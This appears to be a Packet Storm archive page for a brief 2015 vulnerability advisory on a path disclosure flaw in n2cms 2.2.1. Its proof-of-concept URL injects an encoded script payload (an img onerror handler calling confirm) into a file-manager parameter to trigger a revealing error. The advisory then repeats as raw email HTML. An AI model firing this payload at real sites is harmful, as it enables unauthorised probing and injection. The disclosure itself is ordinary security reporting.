what you don't know can hurt you

n2cms 2.2.1 Path Disclosure

n2cms 2.2.1 Path Disclosure
Posted May 7, 2015
Authored by Provensec

n2cms version 2.2.1 suffers from a path disclosure vulnerability.

tags | exploit
MD5 | 860720eff8de3e9b7ec72148b93eae3c

n2cms 2.2.1 Path Disclosure

Change Mirror Download
# Affected software: n2cms
# Type of vulnerability:full path disclosure
# URL:n2cms.com
# Discovered by: provensec
# Website: provensec.com

#version: *2.2.1* <http://n2cms.codeplex.com/releases>
# Proof of concept

http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=%2fupload%2f%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E1.php%2f




manipulating the selected paramter will splash error which discloses system
path

--047d7bd6bb5a40b6a5051578e115
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

<div dir=3D"ltr"><div class=3D"gmail_default" style><span style=3D"font-fam=
ily:'comic sans ms',sans-serif"></span><font face=3D"comic sans ms,=
sans-serif"># Affected software: n2cms</font></div><div class=3D"gmail_def=
ault" style><font face=3D"comic sans ms, sans-serif"># Type of vulnerabilit=
y:full path disclosure</font></div><div class=3D"gmail_default" style><font=
face=3D"comic sans ms, sans-serif"># URL:<a href=3D"http://n2cms.com">n2cm=
s.com</a></font></div><div class=3D"gmail_default" style><font face=3D"comi=
c sans ms, sans-serif"># Discovered by: provensec</font></div><div class=3D=
"gmail_default" style><font face=3D"comic sans ms, sans-serif"># Website: <=
a href=3D"http://provensec.com">provensec.com</a></font></div><div class=3D=
"gmail_default" style><font face=3D"comic sans ms, sans-serif"><br></font><=
/div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-s=
erif">#version:=A0</font><a href=3D"http://n2cms.codeplex.com/releases" sty=
le=3D"color:rgb(0,150,219);text-decoration:none;font-family:Georgia,serif;f=
ont-size:14.3999996185303px"><strong>2.2.1</strong></a><span style=3D"color=
:rgb(51,51,51);font-family:Georgia,serif;font-size:14.3999996185303px">=A0<=
/span></div><div class=3D"gmail_default" style><font face=3D"comic sans ms,=
sans-serif"># Proof of concept</font><span style=3D"font-family:'comic=
sans ms',sans-serif"></span></div><div class=3D"gmail_default" style><=
span style=3D"font-family:'comic sans ms',sans-serif"><br></span></=
div><div class=3D"gmail_default" style><font face=3D"comic sans ms, sans-se=
rif"><a href=3D"http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selecte=
d=3D%2fupload%2f%22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f">=
http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=3D%2fupload%2f=
%22%3E%3Cimg%20src=3Dd%20onerror=3Dconfirm(1);%3E1.php%2f</a><br></font><br=
><br></div><div class=3D"gmail_default" style><br></div><div class=3D"gmail=
_default" style><br>manipulating the selected paramter will splash error wh=
ich discloses system path=A0</div><div class=3D"gmail_default" style><br></=
div><div class=3D"gmail_default" style>=A0</div></div>

Login or Register to add favorites

File Archive:

July 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    13 Files
  • 2
    Jul 2nd
    12 Files
  • 3
    Jul 3rd
    1 Files
  • 4
    Jul 4th
    2 Files
  • 5
    Jul 5th
    34 Files
  • 6
    Jul 6th
    21 Files
  • 7
    Jul 7th
    21 Files
  • 8
    Jul 8th
    13 Files
  • 9
    Jul 9th
    6 Files
  • 10
    Jul 10th
    1 Files
  • 11
    Jul 11th
    3 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    19 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    15 Files
  • 16
    Jul 16th
    9 Files
  • 17
    Jul 17th
    2 Files
  • 18
    Jul 18th
    2 Files
  • 19
    Jul 19th
    19 Files
  • 20
    Jul 20th
    21 Files
  • 21
    Jul 21st
    53 Files
  • 22
    Jul 22nd
    14 Files
  • 23
    Jul 23rd
    14 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close